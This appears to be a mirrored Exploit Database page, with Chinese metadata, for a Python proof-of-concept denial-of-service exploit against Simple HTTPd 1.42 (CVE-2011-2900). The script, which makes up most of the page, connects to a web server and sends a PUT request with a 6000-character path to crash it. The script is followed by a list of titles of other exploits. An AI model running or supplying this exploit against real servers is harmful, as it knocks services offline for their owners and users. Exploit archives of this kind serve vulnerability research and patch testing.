Simple HTTPd 1.42 – Denial of Servive

Exploit Database
97 阅读

作者： G13

日期： 2011-08-12
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/17658/

#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link: 
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit 
still works.
# Simple HTTPd is still affected by the bug. The executable must be 
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.

import socket, sys


buf = "A" * 6000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))

s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()

last Exploits
Simple HTTPd 1.42 – Denial of Servive的更多信息

Quick ‘n Easy FTP Server Lite 3.1 – Denial of Service：
MediaMonkey 4.1.23 – ‘.mp3’ URL Denial of Service (PoC)：
Microsoft DirectWrite / AFDKO – Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory：
XAMPP Control Panel – Denial Of Service：
WebRTC – VP9 Processing Use-After-Free：
Qt 4.6.3 – Remote Denial of Service：
Microsoft Edge Chakra JIT – Memory Corruption：
Trend Micro Enterprise Mobile Security 2.0.0.1700 – ‘Servidor’ Denial of Service (PoC)：